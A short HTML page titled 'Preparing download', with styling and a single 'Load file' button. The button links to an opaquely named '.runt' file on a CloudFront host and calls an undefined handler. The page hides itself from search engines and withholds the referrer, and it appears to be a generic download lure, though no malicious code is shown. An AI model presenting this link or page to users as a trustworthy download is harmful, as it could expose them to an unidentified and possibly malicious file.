<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<header>
	<title>Preparing download</title>
	<meta name="robots" content="noindex,nofollow"/>
	<meta name="referrer" content="no-referrer" />
	<style type="text/css">
	.press {
	  margin: 0 auto;
	  width: 100%;
	}
	.press ul {
	  list-style: outside none none;
	  margin-top: 40px;
	  text-align: center;
	}
	.press ul li {
	  display: inline-block;
	  padding: 0 30px;
	}
	
	@import url(https://fonts.googleapis.com/css?family=Nunito:300);

	body { font-family: "Nunito", sans-serif; font-size: 24px; }
	a    { text-decoration: none; }
	p    { text-align: center; }
	sup  { font-size: 36px; font-weight: 100; line-height: 55px; }

	.button
	{
	  text-transform: uppercase;
	  letter-spacing: 2px;
	  text-align: center;
	  color: #00adcc;

	  font-size: 24px;
	  font-family: "Nunito", sans-serif;
	  font-weight: 300;
	  
	  margin: 5em auto;
	  
	  position: absolute; 
	  top:0; right:0; bottom:0; left:0;
	  
	  padding: 20px 0;
	  width: 220px;
	  height:30px;

	  background: #00adcc;
	  border: 1px solid #00adcc;
	  color: #FFF;
	  overflow: hidden;
	  
	  transition: all 0.5s;
	}

	.button:hover, .button:active 
	{
	  text-decoration: none;
	  color: #00adcc;
	  border-color: #00adcc;
	  background: #FFF;
	}

	.button span 
	{
	  display: inline-block;
	  position: relative;
	  padding-right: 0;
	  
	  transition: padding-right 0.5s;
	}

	.button span:after 
	{
	  content: ' ';  
	  position: absolute;
	  top: 0;
	  right: -18px;
	  opacity: 0;
	  width: 10px;
	  height: 10px;
	  margin-top: -10px;

	  background: rgba(0, 0, 0, 0);
	  border: 3px solid #FFF;
	  border-top: none;
	  border-right: none;

	  transition: opacity 0.5s, top 0.5s, right 0.5s;
	  transform: rotate(-45deg);
	}

	.button:hover span, .button:active span 
	{
	  padding-right: 30px;
	}

	.button:hover span:after, .button:active span:after 
	{
	  transition: opacity 0.5s, top 0.5s, right 0.5s;
	  opacity: 1;
	  border-color: #00adcc;
	  right: 0;
	  top: 50%;
	}
	</style>
</header>
<body>
<p><strong>Download file</strong><br/>click the below button to prepare your file</p>
<a href="http://d29en7e00snu0q.cloudfront.net/5d52fb983eb74105affb0d29008ffb8ccb58557f5e4f84a03c8e628ef2882b58c5.runt" class="button" onclick="dispHelp()">
  <span>Load file</span>
</a>

</body>
</html>